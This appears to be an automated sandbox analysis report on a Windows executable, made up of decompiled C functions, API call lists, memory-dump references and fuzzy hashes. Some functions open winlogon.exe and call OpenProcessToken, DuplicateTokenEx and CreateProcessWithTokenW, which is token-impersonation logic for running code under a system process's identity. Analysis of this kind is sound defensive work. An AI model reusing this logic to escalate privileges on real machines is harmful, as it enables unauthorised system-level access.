                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405bab
                                                                                      0x00405be9
                                                                                      0x00405be9
                                                                                      0x00405baf
                                                                                      0x00405bb1
                                                                                      0x00405ce2
                                                                                      0x00405ce2
                                                                                      0x00405bb7
                                                                                      0x00405bbd
                                                                                      0x00405bf6
                                                                                      0x00405c4b
                                                                                      0x00405c4c
                                                                                      0x00405c52
                                                                                      0x00405c53
                                                                                      0x00000000
                                                                                      0x00405bf8
                                                                                      0x00405c02
                                                                                      0x00405c0e
                                                                                      0x00405c13
                                                                                      0x00405c18
                                                                                      0x00405c2c
                                                                                      0x00405c2e
                                                                                      0x00405c3b
                                                                                      0x00405c3c
                                                                                      0x00405c42
                                                                                      0x00000000
                                                                                      0x00405c1a
                                                                                      0x00405c25
                                                                                      0x00405c2a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405c2a
                                                                                      0x00405c18
                                                                                      0x00405bbf
                                                                                      0x00405bc0
                                                                                      0x00405bcd
                                                                                      0x00405bce
                                                                                      0x00405bd7
                                                                                      0x00405c58
                                                                                      0x00405c5f
                                                                                      0x00405c61
                                                                                      0x00405c61
                                                                                      0x00405c63
                                                                                      0x00405cdb
                                                                                      0x00405cdb
                                                                                      0x00405c65
                                                                                      0x00405c65
                                                                                      0x00405c74
                                                                                      0x00000000
                                                                                      0x00405c84
                                                                                      0x00405c8a
                                                                                      0x00405c8d
                                                                                      0x00405c99
                                                                                      0x00405caf
                                                                                      0x00405cbd
                                                                                      0x00405cc8
                                                                                      0x00405cd4
                                                                                      0x00405cd9
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405cd9
                                                                                      0x00405c74
                                                                                      0x00405c63
                                                                                      0x00405ce6

                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                      • wcscpy.MSVCRT ref: 00405C02
                                                                                        • Part of subcall function 00405EDD: memset.MSVCRT ref: 00405EF0
                                                                                        • Part of subcall function 00405EDD: _itow.MSVCRT ref: 00405EFE
                                                                                      • wcslen.MSVCRT ref: 00405C20
                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                      • LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                      • memcpy.MSVCRT ref: 00405C99
                                                                                        • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B19
                                                                                        • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B37
                                                                                        • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B55
                                                                                        • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B73
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                      • String ID: strings
                                                                                      • API String ID: 3166385802-3030018805
                                                                                      • Opcode ID: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                                      • Instruction ID: 6100db9a332bdf9cdae47e625800c2dd81fdb4e1827941160d8c77da4bb91491
                                                                                      • Opcode Fuzzy Hash: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                                      • Instruction Fuzzy Hash: F0417A74188A149FEB149B54ECE5DB73376F785708720813AE802A72A1DB39AC46CF6C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401E44, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 75%
                                                                                      			E00401E44(int _a4, int _a8, intOrPtr* _a12) {
				char _v8;
				void* _v12;
				void* __esi;
				void* _t18;
				intOrPtr* _t22;
				void* _t23;
				void* _t28;
				int _t37;
				intOrPtr* _t39;
				intOrPtr* _t40;

				_v8 = 0;
				_t18 = OpenProcess(0x2000000, 0, _a8);
				_v12 = _t18;
				if(_t18 == 0) {
					_t37 = GetLastError();
				} else {
					_t39 = _a4 + 0x800;
					_a8 = 0;
					E0040289F(_t39);
					_t22 =  *((intOrPtr*)(_t39 + 4));
					if(_t22 == 0) {
						_t23 = 0;
					} else {
						_t23 =  *_t22(_v12, 2,  &_a8);
					}
					if(_t23 == 0) {
						_t37 = GetLastError();
					} else {
						_a4 = _a8;
						E0040289F(_t39);
						_t40 =  *((intOrPtr*)(_t39 + 8));
						if(_t40 == 0) {
							_t28 = 0;
						} else {
							_t28 =  *_t40(_a4, 0x2000000, 0, 2, 1,  &_v8);
						}
						if(_t28 == 0) {
							_t37 = GetLastError();
						} else {
							 *_a12 = _v8;
							_t37 = 0;
						}
						CloseHandle(_a8);
					}
					CloseHandle(_v12);
				}
				return _t37;
			}













                                                                                      0x00401e59
                                                                                      0x00401e5c
                                                                                      0x00401e64
                                                                                      0x00401e67
                                                                                      0x00401ef9
                                                                                      0x00401e6d
                                                                                      0x00401e70
                                                                                      0x00401e76
                                                                                      0x00401e79
                                                                                      0x00401e7e
                                                                                      0x00401e83
                                                                                      0x00401e92
                                                                                      0x00401e85
                                                                                      0x00401e8e
                                                                                      0x00401e8e
                                                                                      0x00401e96
                                                                                      0x00401ee6
                                                                                      0x00401e98
                                                                                      0x00401e9b
                                                                                      0x00401e9e
                                                                                      0x00401ea3
                                                                                      0x00401ea8
                                                                                      0x00401ebb
                                                                                      0x00401eaa
                                                                                      0x00401eb7
                                                                                      0x00401eb7
                                                                                      0x00401ebf
                                                                                      0x00401ed3
                                                                                      0x00401ec1
                                                                                      0x00401ec7
                                                                                      0x00401ec9
                                                                                      0x00401ec9
                                                                                      0x00401ed8
                                                                                      0x00401ed8
                                                                                      0x00401eeb
                                                                                      0x00401eeb
                                                                                      0x00401f01

                                                                                      APIs
                                                                                      • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EF3
                                                                                        • Part of subcall function 0040289F: LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                                        • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                                        • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                                        • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                                        • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401ECD
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EE0
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: AddressProc$ErrorLast$CloseHandle$LibraryLoadOpenProcess
                                                                                      • String ID: winlogon.exe
                                                                                      • API String ID: 1315556178-961692650
                                                                                      • Opcode ID: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                                      • Instruction ID: 37dd24dd8946aa7f8aa4240fd04c0d288f38f50501b3184a6b0aa07a3247aa85
                                                                                      • Opcode Fuzzy Hash: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                                      • Instruction Fuzzy Hash: FB212932900114EFDB10AFA5CDC8AAE7BB5EB04350F14893AFE06F72A0D7749D41DA94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405236, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 79%
                                                                                      			E00405236(short* __ebx, intOrPtr _a4) {
				int _v8;
				char _v12;
				void _v2058;
				void _v2060;
				int _t35;
				int _t41;
				signed int _t48;
				signed int _t49;
				signed short* _t50;
				void** _t52;
				void* _t53;
				void* _t54;

				_t48 = 0;
				_v2060 = 0;
				memset( &_v2058, 0, 0x7fe);
				_t54 = _t53 + 0xc;
				 *__ebx = 0;
				_t52 = _a4 + 4;
				_v12 = 2;
				do {
					_push( *_t52);
					_t6 = _t52 - 4; // 0xe80040cb
					_push( *_t6);
					_push(L"%s (%s)");
					_push(0x400);
					_push( &_v2060);
					L0040B1EC();
					_t35 = wcslen( &_v2060);
					_v8 = _t35;
					memcpy(__ebx + _t48 * 2,  &_v2060, _t35 + _t35 + 2);
					_t49 = _t48 + _v8 + 1;
					_t41 = wcslen( *_t52);
					_v8 = _t41;
					memcpy(__ebx + _t49 * 2,  *_t52, _t41 + _t41 + 2);
					_t54 = _t54 + 0x34;
					_t52 =  &(_t52[2]);
					_t23 =  &_v12;
					 *_t23 = _v12 - 1;
					_t48 = _t49 + _v8 + 1;
				} while ( *_t23 != 0);
				_t50 = __ebx + _t48 * 2;
				 *_t50 =  *_t50 & 0x00000000;
				_t50[1] = _t50[1] & 0x00000000;
				return __ebx;
			}















                                                                                      0x00405241
                                                                                      0x00405250
                                                                                      0x00405257
                                                                                      0x0040525f
                                                                                      0x00405262
                                                                                      0x00405265
                                                                                      0x00405268
                                                                                      0x0040526f
                                                                                      0x0040526f
                                                                                      0x00405277
                                                                                      0x00405277
                                                                                      0x0040527a
                                                                                      0x0040527f
                                                                                      0x00405284
                                                                                      0x00405285
                                                                                      0x00405291
                                                                                      0x00405296
                                                                                      0x004052a9
                                                                                      0x004052b3
                                                                                      0x004052b7
                                                                                      0x004052bc
                                                                                      0x004052ca
                                                                                      0x004052d2
                                                                                      0x004052d5
                                                                                      0x004052d8
                                                                                      0x004052d8
                                                                                      0x004052db
                                                                                      0x004052db
                                                                                      0x004052e1
                                                                                      0x004052e4
                                                                                      0x004052e8
                                                                                      0x004052f2

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: memcpywcslen$_snwprintfmemset
                                                                                      • String ID: %s (%s)
                                                                                      • API String ID: 3979103747-1363028141
                                                                                      • Opcode ID: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                                      • Instruction ID: 65e1e814fa0bf8ea8ab085bd6ee3311c73c19872bc06834ae6b579d31858dd7b
                                                                                      • Opcode Fuzzy Hash: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                                      • Instruction Fuzzy Hash: C411517280020DEBCF21DF94CC49D8BB7B8FF44308F1144BAE944A7152EB74A6588BD8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040614F, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 78%
                                                                                      			E0040614F(void* __ecx, void* __eflags, struct HWND__* _a4) {
				void _v514;
				short _v516;
				void _v8710;
				short _v8712;
				int _t17;
				WCHAR* _t26;

				E0040B550(0x2204, __ecx);
				_v8712 = 0;
				memset( &_v8710, 0, 0x2000);
				_t17 = GetDlgCtrlID(_a4);
				_t34 = _t17;
				GetWindowTextW(_a4,  &_v8712, 0x1000);
				if(_t17 > 0 && _v8712 != 0) {
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					GetClassNameW(_a4,  &_v516, 0xff);
					_t26 =  &_v516;
					_push(L"sysdatetimepick32");
					_push(_t26);
					L0040B278();
					if(_t26 != 0) {
						E00406025(_t34,  &_v8712);
					}
				}
				return 1;
			}









                                                                                      0x00406157
                                                                                      0x0040616d
                                                                                      0x00406174
                                                                                      0x0040617f
                                                                                      0x00406185
                                                                                      0x00406196
                                                                                      0x0040619e
                                                                                      0x004061b6
                                                                                      0x004061bd
                                                                                      0x004061d4
                                                                                      0x004061da
                                                                                      0x004061e0
                                                                                      0x004061e5
                                                                                      0x004061e6
                                                                                      0x004061ef
                                                                                      0x004061f9
                                                                                      0x004061ff
                                                                                      0x004061ef
                                                                                      0x00406206

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                      • String ID: sysdatetimepick32
                                                                                      • API String ID: 1028950076-4169760276
                                                                                      • Opcode ID: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                                      • Instruction ID: a6c41b950ec0abdba219e0cd23eeccead18917629e413d377b87badc6c60029b
                                                                                      • Opcode Fuzzy Hash: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                                      • Instruction Fuzzy Hash: 65117732840119BAEB20EB95DC89EDF777CEF04754F0040BAF518F1192E7345A81CA9D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00404706, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 52librarywindowCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 68%
                                                                                      			E00404706(long __edi, wchar_t* _a4) {
				short _v8;
				void* _t8;
				void* _t10;
				long _t14;
				long _t24;

				_t24 = __edi;
				_t8 = 0;
				_t14 = 0x1100;
				if(__edi - 0x834 <= 0x383) {
					_t8 = LoadLibraryExW(L"netmsg.dll", 0, 2);
					if(0 != 0) {
						_t14 = 0x1900;
					}
				}
				if(FormatMessageW(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
					_t10 = wcscpy(_a4, 0x40c4e8);
				} else {
					if(wcslen(_v8) < 0x400) {
						wcscpy(_a4, _v8);
					}
					_t10 = LocalFree(_v8);
				}
				return _t10;
			}








                                                                                      0x00404706
                                                                                      0x00404714
                                                                                      0x0040471c
                                                                                      0x00404721
                                                                                      0x0040472b
                                                                                      0x00404733
                                                                                      0x00404735
                                                                                      0x00404735
                                                                                      0x00404733
                                                                                      0x00404751
                                                                                      0x00404780
                                                                                      0x00404753
                                                                                      0x0040475e
                                                                                      0x00404766
                                                                                      0x0040476c
                                                                                      0x00404770
                                                                                      0x00404770
                                                                                      0x0040478a

                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,004047FA,?,?,?,004035EB,?,?), ref: 0040472B
                                                                                      • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB), ref: 00404749
                                                                                      • wcslen.MSVCRT ref: 00404756
                                                                                      • wcscpy.MSVCRT ref: 00404766
                                                                                      • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB,?), ref: 00404770
                                                                                      • wcscpy.MSVCRT ref: 00404780
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                      • String ID: netmsg.dll
                                                                                      • API String ID: 2767993716-3706735626
                                                                                      • Opcode ID: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
                                                                                      • Instruction ID: 89adc518ee94488043421af4a237527fbec77c55aa854962abbb3bd0e0f931e1
                                                                                      • Opcode Fuzzy Hash: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
                                                                                      • Instruction Fuzzy Hash: 4F01D471200114FAEB152B61DD8AE9F7A6CEB46796B20417AFA02B60D1DB755E0086AC
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040598B, Relevance: 12.1, APIs: 8, Instructions: 96COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 90%
                                                                                      			E0040598B(void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v12;
				void* _v16;
				intOrPtr _v20;
				char _v32;
				char _v72;
				void _v582;
				long _v584;
				void* __edi;
				intOrPtr _t27;
				wchar_t* _t34;
				wchar_t* _t42;
				long* _t43;
				int _t44;
				void* _t52;
				void* _t54;
				long _t56;
				long* _t57;
				void* _t60;

				_t60 = __eflags;
				_t52 = __edx;
				E004095AB( &_v72);
				_v584 = 0;
				memset( &_v582, 0, 0x1fe);
				E004095FD(_t52, _t60,  &_v72);
				_t27 = 0;
				_v12 = 0;
				if(_v20 <= 0) {
					L10:
					_t56 = 0;
				} else {
					do {
						_t57 = E00405A92(_t27,  &_v32);
						if(E00409A94( *_t57,  &_v584) == 0) {
							goto L9;
						} else {
							_t34 =  &_v584;
							_push(_t34);
							_push(_a4);
							L0040B278();
							if(_t34 == 0) {
								L5:
								_t44 = 0;
								_t54 = OpenProcess(0x2000000, 0,  *_t57);
								if(_t54 == 0) {
									goto L9;
								} else {
									_v16 = _v16 & 0;
									if(OpenProcessToken(_t54, 2,  &_v16) != 0) {
										_t44 = 1;
										CloseHandle(_v16);
									}
									CloseHandle(_t54);
									if(_t44 != 0) {
										_t56 =  *_t57;
									} else {
										goto L9;
									}
								}
							} else {
								_t42 = wcschr( &_v584, 0x5c);
								if(_t42 == 0) {
									goto L9;
								} else {
									_t43 =  &(_t42[0]);
									_push(_t43);
									_push(_a4);
									L0040B278();
									if(_t43 != 0) {
										goto L9;
									} else {
										goto L5;
									}
								}
							}
						}
						goto L12;
						L9:
						_t27 = _v12 + 1;
						_v12 = _t27;
					} while (_t27 < _v20);
					goto L10;
				}
				L12:
				E004095DA( &_v72);
				return _t56;
			}





















                                                                                      0x0040598b
                                                                                      0x0040598b
                                                                                      0x0040599a
                                                                                      0x004059ae
                                                                                      0x004059b5
                                                                                      0x004059c1
                                                                                      0x004059c6
                                                                                      0x004059cb
                                                                                      0x004059ce
                                                                                      0x00405a7b
                                                                                      0x00405a7b
                                                                                      0x004059d4
                                                                                      0x004059d4
                                                                                      0x004059dc
                                                                                      0x004059ee
                                                                                      0x00000000
                                                                                      0x004059f0
                                                                                      0x004059f0
                                                                                      0x004059f6
                                                                                      0x004059f7
                                                                                      0x004059fa
                                                                                      0x00405a03
                                                                                      0x00405a2b
                                                                                      0x00405a2e
                                                                                      0x00405a3c
                                                                                      0x00405a40
                                                                                      0x00000000
                                                                                      0x00405a42
                                                                                      0x00405a42
                                                                                      0x00405a54
                                                                                      0x00405a59
                                                                                      0x00405a5a
                                                                                      0x00405a5a
                                                                                      0x00405a61
                                                                                      0x00405a69
                                                                                      0x00405a7f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405a69
                                                                                      0x00405a05
                                                                                      0x00405a0e
                                                                                      0x00405a17
                                                                                      0x00000000
                                                                                      0x00405a19
                                                                                      0x00405a19
                                                                                      0x00405a1c
                                                                                      0x00405a1d
                                                                                      0x00405a20
                                                                                      0x00405a29
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405a29
                                                                                      0x00405a17
                                                                                      0x00405a03
                                                                                      0x00000000
                                                                                      0x00405a6b
                                                                                      0x00405a6e
                                                                                      0x00405a72
                                                                                      0x00405a72
                                                                                      0x00000000
                                                                                      0x004059d4
                                                                                      0x00405a81
                                                                                      0x00405a84
                                                                                      0x00405a8f

                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 004059B5
                                                                                        • Part of subcall function 004095FD: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409619
                                                                                        • Part of subcall function 004095FD: memset.MSVCRT ref: 0040962E
                                                                                        • Part of subcall function 004095FD: Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                                        • Part of subcall function 004095FD: Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                                        • Part of subcall function 004095FD: CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                                        • Part of subcall function 00409A94: memset.MSVCRT ref: 00409AB7
                                                                                        • Part of subcall function 00409A94: memset.MSVCRT ref: 00409ACF
                                                                                        • Part of subcall function 00409A94: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                                        • Part of subcall function 00409A94: memset.MSVCRT ref: 00409B25
                                                                                        • Part of subcall function 00409A94: GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                                        • Part of subcall function 00409A94: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                                        • Part of subcall function 00409A94: FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                                      • _wcsicmp.MSVCRT ref: 004059FA
                                                                                      • wcschr.MSVCRT ref: 00405A0E
                                                                                      • _wcsicmp.MSVCRT ref: 00405A20
                                                                                      • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                                      • OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                                      • CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: memset$CloseHandle$OpenProcess$Process32_wcsicmp$AddressCreateFirstFreeLibraryNextProcSnapshotTokenToolhelp32wcschr
                                                                                      • String ID:
                                                                                      • API String ID: 768606695-0
                                                                                      • Opcode ID: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                                      • Instruction ID: 2def5e4e0f7fb713a9aee1133a075480eaa7d54608268b88a97ef3230c71c50c
                                                                                      • Opcode Fuzzy Hash: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                                      • Instruction Fuzzy Hash: 18318472A00619ABDB10EBA1DD89AAF77B8EF04345F10457BE905F2191EB349E018F98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00407639, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 64%
                                                                                      			E00407639(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void _v68;
				char _v108;
				void _v160;
				void* __esi;
				signed int _t55;
				void* _t57;
				wchar_t* _t67;
				intOrPtr* _t73;
				signed int _t74;
				signed int _t86;
				signed int _t95;
				intOrPtr* _t98;
				void* _t100;
				void* _t102;

				_t73 = __ebx;
				_t74 = 0xd;
				_push(9);
				memcpy( &_v160, L"<td bgcolor=#%s nowrap>%s", _t74 << 2);
				memcpy( &_v68, L"<td bgcolor=#%s>%s", 0 << 2);
				_t102 = _t100 + 0x18;
				asm("movsw");
				E00407343(__ebx, _a4, L"<tr>");
				_t95 = 0;
				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
					do {
						_t55 =  *( *((intOrPtr*)(_t73 + 0x30)) + _t95 * 4);
						_v8 = _t55;
						_t57 =  &_v160;
						if( *((intOrPtr*)(_t55 * 0x14 +  *((intOrPtr*)(_t73 + 0x40)) + 8)) == 0) {
							_t57 =  &_v68;
						}
						_t98 = _a8;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _v16 & 0x00000000;
						_v12 = _t57;
						 *((intOrPtr*)( *_t73 + 0x34))(5, _t95, _t98,  &_v28);
						E0040ADC0(_v28,  &_v108);
						E0040ADF1( *((intOrPtr*)( *_t98))(_v8,  *((intOrPtr*)(_t73 + 0x60))),  *(_t73 + 0x64));
						 *((intOrPtr*)( *_t73 + 0x50))( *(_t73 + 0x64), _t98, _v8);
						_t67 =  *(_t73 + 0x64);
						_t86 =  *_t67 & 0x0000ffff;
						if(_t86 == 0 || _t86 == 0x20) {
							wcscat(_t67, L"&nbsp;");
						}
						E0040AE90( &_v28,  *((intOrPtr*)(_t73 + 0x68)),  *(_t73 + 0x64));
						_push( *((intOrPtr*)(_t73 + 0x68)));
						_push( &_v108);
						_push(_v12);
						_push(0x2000);
						_push( *((intOrPtr*)(_t73 + 0x60)));
						L0040B1EC();
						_t102 = _t102 + 0x1c;
						E00407343(_t73, _a4,  *((intOrPtr*)(_t73 + 0x60)));
						_t95 = _t95 + 1;
					} while (_t95 <  *((intOrPtr*)(_t73 + 0x2c)));
				}
				return E00407343(_t73, _a4, L"\r\n");
			}























                                                                                      0x00407639
                                                                                      0x00407646
                                                                                      0x00407647
                                                                                      0x00407654
                                                                                      0x0040765f
                                                                                      0x0040765f
                                                                                      0x0040766b
                                                                                      0x0040766d
                                                                                      0x00407672
                                                                                      0x00407677
                                                                                      0x0040767d
                                                                                      0x00407680
                                                                                      0x00407686
                                                                                      0x00407691
                                                                                      0x00407697
                                                                                      0x00407699
                                                                                      0x00407699
                                                                                      0x0040769c
                                                                                      0x0040769f
                                                                                      0x004076a3
                                                                                      0x004076a7
                                                                                      0x004076ab
                                                                                      0x004076b5
                                                                                      0x004076be
                                                                                      0x004076c8
                                                                                      0x004076de
                                                                                      0x004076ee
                                                                                      0x004076f1
                                                                                      0x004076f4
                                                                                      0x004076fa
                                                                                      0x00407708
                                                                                      0x0040770e
                                                                                      0x00407718
                                                                                      0x0040771d
                                                                                      0x00407723
                                                                                      0x00407724
                                                                                      0x00407727
                                                                                      0x0040772c
                                                                                      0x0040772f
                                                                                      0x00407734
                                                                                      0x0040773f
                                                                                      0x00407744
                                                                                      0x00407745
                                                                                      0x0040767d
                                                                                      0x00407760

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
